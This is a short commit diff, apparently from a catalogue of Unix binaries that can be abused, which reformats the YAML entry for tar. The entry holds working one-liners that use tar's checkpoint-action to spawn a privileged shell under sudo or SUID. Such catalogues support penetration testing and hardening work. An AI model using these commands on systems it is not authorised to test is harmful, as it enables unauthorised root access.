Add missing descriptions

This commit is contained in:
Emilio Pinna
2018-05-22 21:22:20 +01:00
parent 8f992a27f1
commit 158291baa4
4 changed files with 14 additions and 13 deletions

View File

@@ -5,6 +5,5 @@ functions:
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
-p"
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"
---